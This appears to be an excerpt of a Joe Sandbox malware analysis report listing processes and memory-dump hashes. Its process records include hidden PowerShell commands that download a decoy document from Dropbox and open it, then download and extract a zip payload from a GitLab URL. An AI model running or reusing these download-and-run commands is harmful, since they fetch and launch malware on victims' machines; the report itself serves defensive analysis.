                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:find
                                                                                                                                                                                                              Imagebase:0x7ff705200000
                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:02:35:13
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                              Imagebase:0x7ff677e60000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:02:35:13
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"
                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:02:35:22
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'"
                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                              Start time:02:35:24
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:04:22:14
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.1402987492.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffaac390000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: f292ea0a294c38fbb5f35ba99821f0257f5a5d258352f1755e928eabb60cbd4c
                                                                                                                                                                                                                • Instruction ID: 8bd2450a5d32aae1562ffedd0d6216bd77328c67cee4ed55958cc34934d5cdcd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f292ea0a294c38fbb5f35ba99821f0257f5a5d258352f1755e928eabb60cbd4c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65D1F56290EBC58FF35697B858259B5BFE0EF57210B0841FFD08DC70A3D91D984983A2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.1402987492.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffaac390000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8a05c38ad412cbfa1ba55a10a488dd0677e1ce09a6284f2fbfbbc93b9f96ebdd
                                                                                                                                                                                                                • Instruction ID: 96cb67746843b09297b91bd7b0d4f119acd72ee2a91022294864fdf8782e957b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a05c38ad412cbfa1ba55a10a488dd0677e1ce09a6284f2fbfbbc93b9f96ebdd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20D128B190EB8A8FF7A5976C88649B5BBE0EF56310B0441FED04DC72D3D929D808C3A1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.1402987492.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffaac390000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 43a493b0bbd3d579613532ed01aea9f53ba1544209fd77e42fcca0eb516adc49
                                                                                                                                                                                                                • Instruction ID: 3c746f33d4c8d2bb0221abf17d38dcb364478f8603e74fb115a3931c6155f00c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a493b0bbd3d579613532ed01aea9f53ba1544209fd77e42fcca0eb516adc49
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55312562A1FF868FF7A997AC4871878B6C0EF57255B5440BED04EC20E3DC1ED80882E1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.1402510416.00007FFAAC2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2C0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffaac2c0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                • Instruction ID: 01e5622666f292e2c1de4fb6a4b696fc2e9de059a31d7c967cc2dd39a0abc4ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC01A77111CB0C8FD744EF0CE051AB6B3E0FB95320F10052EE58AC3665DA32E881CB41
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000F.00000002.1602311207.00007FFAAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC310000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffaac310000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3b26e97ba69d4707f2c873241391190bc990e70421fb51e319d841628ff7717c
                                                                                                                                                                                                                • Instruction ID: 980be67337417305dc381c5c85c61154ded6d51b16e9622b152f359086da2039
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b26e97ba69d4707f2c873241391190bc990e70421fb51e319d841628ff7717c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C61477150DB858FE745EB2CC8A1DA5BBE4EF57320B0841FAD08DC71A3D925A80AC7D1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000F.00000002.1602975194.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffaac3e0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9eacdbd5b1e2d00c4c4aab278b8b03d0798d2a948ad62a9f58f21453aeb3b7d6
                                                                                                                                                                                                                • Instruction ID: dbd80e8531a0b81afc0b4e331bb6a09c147978481cd953d9743b60426dc2cbb7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eacdbd5b1e2d00c4c4aab278b8b03d0798d2a948ad62a9f58f21453aeb3b7d6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2512422A1EF4A8FF799A76C58529B9B7D1EF42210B4841BED04EC30D3DE18E80987D1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000F.00000002.1602975194.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffaac3e0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 74f8afb30fa2d787a4df364d08444209024ee35da327333db5e2a202be0c12e1
                                                                                                                                                                                                                • Instruction ID: 1c33cb28394637f66db12c737c8312b087b4245385c7f3309454053a21197d4d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74f8afb30fa2d787a4df364d08444209024ee35da327333db5e2a202be0c12e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C310762A1FF878FF7A9A7685851978B6C1FF5221575840BED04DC30D3DE18D80897E1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000F.00000002.1602311207.00007FFAAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC310000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffaac310000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                • Instruction ID: 1c3c62233d90dfe2e9338eccf2323ce3679ad014aafd880dbd6ec810bb95a42f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4601A77010CB0C8FDB44EF0CE051AA5B3E0FB95320F10052DE58AC3665DA36E881CB41
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000F.00000002.1602311207.00007FFAAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC310000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffaac310000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dd1ce586dd1983cf41b6eaca60786b675501d5061f173df16b0370d856a0fbc5
                                                                                                                                                                                                                • Instruction ID: 4ebedb166eb9b63f3f8fe377a0ce96b0216f6596536063cd091cbb19aa7977a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd1ce586dd1983cf41b6eaca60786b675501d5061f173df16b0370d856a0fbc5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9F0373275C6048FDB4CAA1CF442DB573D1E799320B10456EE48BC3696D917E8468685
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000F.00000002.1602311207.00007FFAAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC310000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffaac310000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9b42f3dead05e8f33984f26f8e28d18ce367a11f8e890994e155009d53dfcc3c
                                                                                                                                                                                                                • Instruction ID: 13349fcdd43dde80c2754fc8d79cfbac83fcc39b9b4ea0271110dda4dc6b5f72
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b42f3dead05e8f33984f26f8e28d18ce367a11f8e890994e155009d53dfcc3c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 673198BBA0A2625FE314F7ADF8A1CDA3758DF82336308897BD5C9C9173C924504A46E4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (Pk$(Pk$(Pk$(Pk$(Pk$(Pk$(Pk$(Pk$(Pk
                                                                                                                                                                                                                • API String ID: 0-3506812590
                                                                                                                                                                                                                • Opcode ID: 31c3ce5f8f3fe12207dce2afcfa9eb19389704e15f8f77312b0f88b1fb5048af
                                                                                                                                                                                                                • Instruction ID: d96a75ad68eb4731c36d2da595db5e1a1d4b59dc8aa657f7b9bd450d6add5087
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31c3ce5f8f3fe12207dce2afcfa9eb19389704e15f8f77312b0f88b1fb5048af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8471D461E18D1A8FFA95EB6CC415ABDA3D2EF99750B008576D04EC32D2DE2CEC4683C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $(Pk$(Pk$r6,
                                                                                                                                                                                                                • API String ID: 0-2759135112
                                                                                                                                                                                                                • Opcode ID: cacc2c153411d16304eb8156d2ee2f2f3fccf94b2c964c857566e1504d0d3017
                                                                                                                                                                                                                • Instruction ID: 043708c1f51bf7139f4eee1e520278d35c80edc5eafb6bc38095f422677c2377
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cacc2c153411d16304eb8156d2ee2f2f3fccf94b2c964c857566e1504d0d3017
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4918C7160EA4C4FEB65EB2C9815BB5BBD1EF96310F0445BBE04DC7262C918DC4683D1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: K6$ K6$N_^
                                                                                                                                                                                                                • API String ID: 0-3678507744
                                                                                                                                                                                                                • Opcode ID: 2f435ff7a8576a0595f04fcf2865821c7047f9c16a098ede4ab25fc67722ede6
                                                                                                                                                                                                                • Instruction ID: a7520faff8a40b79816c561a84217f41d59efa345f1584c43e9bfe84acd7c985
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f435ff7a8576a0595f04fcf2865821c7047f9c16a098ede4ab25fc67722ede6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EB10AA2F1EE468FFB9697388461BB9A7D1EF86310F0584BAD04EC71D3DD28D8064791
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 8M6$NS_H
                                                                                                                                                                                                                • API String ID: 0-3473189964
                                                                                                                                                                                                                • Opcode ID: bc78ffc89ae143a003bf95513dd569b85e2b158a898780ce3f3781ea12ef4087
                                                                                                                                                                                                                • Instruction ID: 569089e1b8c650fccbb399afd0517645ffb73cf605a7444ba99fd7667ab9d851
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc78ffc89ae143a003bf95513dd569b85e2b158a898780ce3f3781ea12ef4087
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A41D331E09D0E8FF795DB189416BB9B3E1EB99300F404976E40ED32C2DE68E80947D2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 8M6$NS_H
                                                                                                                                                                                                                • API String ID: 0-3473189964
                                                                                                                                                                                                                • Opcode ID: 294822a546a1d7e73c09a1fd3a1bf20194d1f8e19a339138a7331e9b4107b161
                                                                                                                                                                                                                • Instruction ID: 732c40ac68baf732007695f28620d8e261058d79559db0e8f611df6f220da91f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 294822a546a1d7e73c09a1fd3a1bf20194d1f8e19a339138a7331e9b4107b161
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96319331909D0E8BF795DF28D456BFAB6E1EF59310F00493AE40ED32D2CE68E84986D1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 8M6$NS_H
                                                                                                                                                                                                                • API String ID: 0-3473189964
                                                                                                                                                                                                                • Opcode ID: 15b4150076903852fbcbcf78897db99ce2f3543b8b9c975be11bcee460771065
                                                                                                                                                                                                                • Instruction ID: aa1d711fc46741bb0700b4d536b9123af94bf7a3506f82aeaf46b309add5c316
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15b4150076903852fbcbcf78897db99ce2f3543b8b9c975be11bcee460771065
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7731C431909E4D8FF796DB289411BA9B7E1EF56300F04497BD44ED32C2CE68E84887D2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: bS_L
                                                                                                                                                                                                                • API String ID: 0-2631416925
                                                                                                                                                                                                                • Opcode ID: d5aa2e90bd95dc9c4f6e65b2165cec739fd2f5f185561e654c0f7b50b48b0fe7
                                                                                                                                                                                                                • Instruction ID: b52dc713d89a5fb945ffc6f1629767008f2ee288130eb85f65facdd2e90dbc9e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5aa2e90bd95dc9c4f6e65b2165cec739fd2f5f185561e654c0f7b50b48b0fe7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47220834608A4D8FDF89EF1CC894AA977F1FF69301B0545AAE85ED72A1DA35EC41CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: K6
                                                                                                                                                                                                                • API String ID: 0-2490395240
                                                                                                                                                                                                                • Opcode ID: c1ed409eb6f99c7f6a402fd0c028acfdceff1b9ae69e69cd4b6646d10819da27
                                                                                                                                                                                                                • Instruction ID: 83c02ed2f55264d59b265afe223b0b2fc17ca4f743d8d5a886c111174e50c2d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1ed409eb6f99c7f6a402fd0c028acfdceff1b9ae69e69cd4b6646d10819da27
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E551067060AE498FE795DB2CD454B65BBE0FF4931170944BBE08EC7262DA24EC85C7D1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (Pk
                                                                                                                                                                                                                • API String ID: 0-3618340021
                                                                                                                                                                                                                • Opcode ID: 7901d50ca4664e771091d2e21ef4b69f2e1cfea0ef9e9b409b3d9a980cf8324b
                                                                                                                                                                                                                • Instruction ID: dd136c1acf81bc00b1c1e79f127edad72ddf7d73c243f6d892a3073424893287
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7901d50ca4664e771091d2e21ef4b69f2e1cfea0ef9e9b409b3d9a980cf8324b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D051AB61A1EE458FF756973C9856BB5BBD1DF46200B0448BBE04EC31D2DC58F84A83D2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (Pk
                                                                                                                                                                                                                • API String ID: 0-3618340021
                                                                                                                                                                                                                • Opcode ID: 982ddc1bcd2199884819f851e4cece2350f52cbbb116cb081787ae0e1a471e30
                                                                                                                                                                                                                • Instruction ID: ad3bd64190ec670b0a11741af368b04006e79b30b9e42453b280ed7d6dadd7d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 982ddc1bcd2199884819f851e4cece2350f52cbbb116cb081787ae0e1a471e30
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8151C631A0DD088FEB55EB28D855BB9B3E2EF95300F0044BAD44EC7192DD24EC0687D1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (Pk
                                                                                                                                                                                                                • API String ID: 0-3618340021
                                                                                                                                                                                                                • Opcode ID: 45bdbee500c1a249c922b796f1f9c6800f3fd8374d17c46072e63cb5417c8dec
                                                                                                                                                                                                                • Instruction ID: a82fa4489686bd7f6bc9648bc58941376b74385429a9fab7321ceb9d550f91c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45bdbee500c1a249c922b796f1f9c6800f3fd8374d17c46072e63cb5417c8dec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8931B521A09D498FEB99DB28C454F75B7D1EF95300B1448BAD04EC7292DE58FC86C7D1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 8M6
                                                                                                                                                                                                                • API String ID: 0-89156010
                                                                                                                                                                                                                • Opcode ID: a70b00baf6ca46adbdf24cde58992d050fcc0de005634b311db688165ff101b2
                                                                                                                                                                                                                • Instruction ID: 9756e6e511b48d0e7fde45a6c82bbcabed637230b55af1969dd309bf73337b5e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a70b00baf6ca46adbdf24cde58992d050fcc0de005634b311db688165ff101b2
